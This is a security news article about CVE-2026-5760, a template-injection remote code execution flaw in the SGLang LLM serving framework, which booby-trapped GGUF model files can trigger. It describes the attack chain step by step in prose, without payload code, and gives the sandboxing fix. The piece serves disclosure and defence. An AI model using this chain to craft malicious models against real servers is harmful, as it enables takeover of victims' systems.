Abstract illustration of a digital lock with code flowing around it, representing a cybersecurity vulnerability in an AI system.
Uncategorized

Critical RCE Vulnerability Rocks SGLang: Malicious AI Models Pose Severe Threat

Share
Share
Pinterest Hidden

A severe security flaw, identified as CVE-2026-5760 and boasting a critical CVSS score of 9.8, has been uncovered in SGLang, a popular open-source serving framework for large language models (LLMs) and multimodal AI. This vulnerability presents a significant risk, potentially allowing attackers to achieve remote code execution (RCE) on affected systems through specially crafted AI model files.

The Looming Threat: RCE via Malicious GGUF Models

The core of this critical vulnerability lies in a command injection flaw that enables the execution of arbitrary code. SGLang, a high-performance framework with a substantial community footprint (over 5,500 forks and 26,100 stars on GitHub), is widely used for deploying and serving advanced AI models. Its widespread adoption means the impact of this RCE flaw could be far-reaching.

How the Attack Unfolds: A Malicious Template Injection

According to an advisory from the CERT Coordination Center (CERT/CC), the vulnerability specifically targets SGLang’s /v1/rerank endpoint. An attacker can exploit this by creating a malicious GPT-Generated Unified Format (GGUF) model file. This file contains a crafted tokenizer.chat_template parameter embedded with a Jinja2 server-side template injection (SSTI) payload.

The CERT/CC elaborates: “An attacker exploits this vulnerability by creating a malicious GPT Generated Unified Format (GGUF) model file with a crafted tokenizer.chat_template parameter that contains a Jinja2 server-side template injection (SSTI) payload with a trigger phrase to activate the vulnerable code path.”

The attack chain is disturbingly straightforward:

  1. An attacker crafts a GGUF model file, embedding a malicious Jinja2 SSTI payload within its tokenizer.chat_template.
  2. This template includes a specific trigger phrase (e.g., the Qwen3 reranker trigger) designed to activate the vulnerable code path within entrypoints/openai/serving_rerank.py.
  3. A victim downloads and loads this compromised model into SGLang, potentially from public repositories like Hugging Face.
  4. When a request is made to the /v1/rerank endpoint, SGLang processes the chat_template and renders it using jinja2.Environment().
  5. Crucially, the SSTI payload executes, allowing the attacker to run arbitrary Python code on the SGLang server, thereby achieving full RCE.

The Technical Underbelly: Unsandboxed Jinja2 Environment

Security researcher Stuart Beck, credited with discovering and reporting this flaw, identified the root cause: SGLang’s use of jinja2.Environment() without proper sandboxing. Instead of employing the more secure ImmutableSandboxedEnvironment, the framework’s default configuration leaves it exposed. This oversight allows a malicious model to bypass security measures and execute arbitrary Python code directly on the inference server.

Echoes of Past Vulnerabilities: Llama Drama and vLLM

CVE-2026-5760 is not an isolated incident; it shares a vulnerability class with other recent, high-profile flaws in the AI ecosystem. Notably, it mirrors CVE-2024-34359, dubbed “Llama Drama” (CVSS 9.7), a critical RCE flaw in the llama_cpp_python Python package that has since been patched. Similarly, a related attack surface was addressed in vLLM late last year (CVE-2025-61620, CVSS 6.5).

These recurring vulnerabilities underscore a broader challenge in securing AI serving frameworks, particularly concerning how they handle user-provided model components and template rendering.

Mitigation: The Path to Security

The recommended mitigation is clear and urgent. CERT/CC advises: “To mitigate this vulnerability, it is recommended to use ImmutableSandboxedEnvironment instead of jinja2.Environment() to render the chat templates. This will prevent the execution of arbitrary Python code on the server.”

As of the advisory’s release, no official patch or response from SGLang was obtained during the coordination process, making immediate implementation of this mitigation crucial for users. Organizations deploying SGLang should prioritize reviewing their configurations and applying the recommended sandboxing to protect against potential exploitation.


For more details, visit our website.

Source: Link

Share

Leave a comment

Leave a Reply

Your email address will not be published. Required fields are marked *